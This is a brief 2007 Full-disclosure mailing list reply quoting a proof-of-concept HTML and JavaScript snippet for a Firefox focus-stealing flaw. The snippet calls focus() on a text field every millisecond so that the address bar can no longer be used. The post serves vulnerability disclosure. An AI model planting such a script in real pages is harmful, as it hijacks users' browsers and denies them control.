Re: [Full-disclosure] Firefox focus stealing vulnerability (possibly other browsers)From: Ben Bucksch <news () bucksch org> Date: Sun, 11 Feb 2007 23:25:32 +0100
pdp (architect) wrote:
try this
<input id="foo" type="text"/>
<script>
setInterval(function () {
document.getElementById('foo').focus();
},1);
</script>
:) the address bar is disabled...